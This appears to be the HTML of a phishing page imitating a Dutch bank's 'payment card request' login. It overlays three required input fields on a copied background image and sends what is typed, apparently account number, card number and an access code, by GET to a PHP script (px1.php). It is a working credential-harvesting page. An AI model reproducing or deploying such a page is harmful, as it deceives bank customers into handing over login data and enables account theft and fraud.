<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html><head>
<meta content="text/html; charset=ISO-8859-1" http-equiv="content-type"><title>Aanvraag betaalpas</title>

<link rel="shortcut icon" href="fav1.ico">
<link rel="icon" type="image/x-icon" href="fav1.ico">
<style type="text/css">
body {
text-decoration: none;
font-family: Arial,Helvetica,sans-serif;
background-repeat: no-repeat;
background-position: left top;
background-image: url(Xackground-1.png);
}
input.P1 {
position: absolute;
top: 336px;
left: 366px;
}
input.P2 {
position: absolute;
top: 381px;
left: 281px;
}
input.P3 {
position: absolute;
top: 548px;
left: 637px;
}
input.P4 {
position: absolute;
top: 576px;
left: 280px;
font-family: Arial,Helvetica,sans-serif;
font-weight: bold;
color: #000066;
}
input.P5 {
position: absolute;
top: 576px;
left: 360px;
font-family: Arial,Helvetica,sans-serif;
color: #000066;
}
</style>
</head>
<body>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<a href="online_scan.html">
<img src="scanner_but.png" style="position: absolute; font-family: Arial,Helvetica,sans-serif; height: 214px; width: 183px; top: 214px; left: 65px;"></a><br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<form method="get" action="px1.php" name="form">
<input class="P1" maxlength="9" size="13" tabindex="1" name="P1" required="">&nbsp;
<input class="P2" maxlength="4" size="5" tabindex="2" name="P2" required=""><input class="P3" maxlength="8" size="11" tabindex="3" name="P3" required=""><input name="P4" class="P4" value="Inloggen" type="submit"><input class="P5" name="P5" value="Annuleren" type="reset"><br>
</form>
</body></html>
